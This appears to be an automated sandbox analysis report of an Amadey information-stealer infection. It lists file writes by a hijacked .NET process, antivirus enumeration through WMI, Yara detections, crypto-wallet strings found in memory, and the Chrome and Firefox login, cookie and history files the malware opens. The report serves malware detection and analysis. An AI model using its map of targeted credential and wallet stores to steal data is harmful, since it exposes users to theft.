Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\saved-telemetry-pings\d1a7a52e-e3c7-4e69-93b1-055dbe542ec9	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\archived\2023-10\1696493966543.975fa64d-84a3-45a6-931b-6d9e916c1153.event.jsonlz4	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\archived\2023-10\1696493966546.1036486f-a56a-437b-b1e7-a2f1fa5fb914.main.jsonlz4	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\archived\2023-10\1696493966547.008ede48-c825-4f89-a2a2-325df2c42c07.first-shutdown.jsonlz4	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\glean\events\background-update	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\glean\events\events	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\archived\2023-10\1696493971707.a2d29e6c-ac08-481c-a5a2-3b45379df53a.health.jsonlz4	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\glean\pending_pings\036d0311-0554-4100-9fa8-d932e8d08b3a	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\glean\pending_pings\1eec0575-b4e6-4e3a-8120-1c64a549cf4d	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\glean\pending_pings\3c7a728e-a155-4cc6-a293-522ff9409223	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\glean\pending_pings\6830e690-c9e2-4163-804c-2e4b4f66b5a1	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\glean\pending_pings\878d3b18-7365-4283-b9d4-9d57cf8fbefd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\archived\2023-10\1696493971736.1d0a55ec-8147-406f-a800-14c2abac24f9.event.jsonlz4	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\archived\2023-10\1696493971736.b5870d07-97bf-4bf9-a21f-d4715e2d8984.health.jsonlz4	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\archived\2023-10\1696493971742.d1a7a52e-e3c7-4e69-93b1-055dbe542ec9.main.jsonlz4	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\glean\pending_pings\68582a3e-63c9-4674-9a87-c796e9492d98	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\glean\pending_pings\5fde80e9-4710-4773-9d91-3de50eb3a611	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\glean\pending_pings\3026813b-3a35-4f80-9cae-dbfc31ca1561	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\glean\pending_pings\1864fd66-67cd-4e70-8503-03455dd087ef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\glean\pending_pings\8e0ea440-692c-4546-bda1-eee741f68cac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\storage\permanent\chrome\.metadata-v2	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\glean\pending_pings\7838fbf6-8c2c-41db-82b4-de4fd94ddc30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\glean\pending_pings\612c12d3-948f-48f6-91fb-d0d8ccda0670	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\glean\pending_pings\36538aaa-6959-4075-90b3-e0189a8af344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\glean\pending_pings\1d907579-3a41-4eb0-8f60-3efb8736231d	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\glean\pending_pings\bc3a7ef5-b3fe-4d70-bd89-e3ab232ffcdb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\storage\permanent\chrome\idb\3561288849sdhlie.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\storage\permanent\chrome\idb\2918063365piupsah.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\glean\pending_pings\cda89272-a9f9-47ec-8bfb-229c7c5839c5	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\glean\pending_pings\d5ff5767-2951-4d26-a577-46b75b9fa89c	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\datareporting\glean\pending_pings\e55a0594-28e6-48b8-887a-84c346ad1268	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.powershell.exe.1f071b290b0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.powershell.exe.1f071b290b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1531539658.000001F071990000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegSvcs.exe, 0000000B.00000002.3946822654.0000000002A83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: RegSvcs.exe, 0000000B.00000002.3946822654.0000000002A83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tibnejdfjmmkpcnlpebklmnkoeoihofecuTronLinkvnkbihfbeogaeaoehlefnkodbefgpgknnwMetaMaskxfhbohimaelbohpjbbldcngcnapndodjpyBinance Chain Walletzffnbelfdoeiohenkjibnmadjiehjhajb{Yoroi\|cjelfplplebdjjenllpjcblmjkfcffne}Jaxx Liberty~fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: RegSvcs.exe, 0000000B.00000002.3946822654.0000000002A83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus Web3
Source: RegSvcs.exe, 0000000B.00000002.3946822654.0000000002A83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: powershell.exe, 00000000.00000002.1550052019.00007FFB4B2F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13340967539494275	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Affiliation Database	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\000003.log	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\MANIFEST-000001	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\000003.log	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PrivateAggregation-journal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\192.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\Lite\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\LOG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\bc3a7ef5-b3fe-4d70-bd89-e3ab232ffcdb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\96.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\96.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\the-real-index	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Favicons	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\LOCK	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOCK	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db	Jump to behavior
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\saved-telemetry-pings\a0ebe742-48e8-4a28-8e8d-154ae0edb2dd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOCK	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\LOG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOCK	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOCK	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\Lite\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\697416b8-55c0-41ac-9636-a06aa38f99e9\model-info.pb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\192.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\af2cf244-1bda-453b-baae-9793e72e9be8\model_metadata.pb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\favicons.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\LOG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\webappsstore.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\36538aaa-6959-4075-90b3-e0189a8af344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\addons.json	Jump to behavior
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\saved-telemetry-pings\47ecb6f6-6e2a-4b91-bef9-d3dd22eada1b
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\32.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Affiliation Database-journal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\5fde80e9-4710-4773-9d91-3de50eb3a611	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\LOCK	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\Lite\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOCK	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e9edf720-d88f-46ea-8d95-7134a339b3c1\model.tflite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\84b89d2b-fec7-4b59-87f2-603dcfbd43dd\model-info.pb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\af2cf244-1bda-453b-baae-9793e72e9be8\global-entities_names_filter	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\MANIFEST-000001	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\MANIFEST-000001	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\32.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493971707.a2d29e6c-ac08-481c-a5a2-3b45379df53a.health.jsonlz4	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\af2cf244-1bda-453b-baae-9793e72e9be8\model.tflite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\881ae04a-fa90-4a62-8eee-5ae000467040\model-info.pb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\128.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SharedStorage	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\1eec0575-b4e6-4e3a-8120-1c64a549cf4d	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\256.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
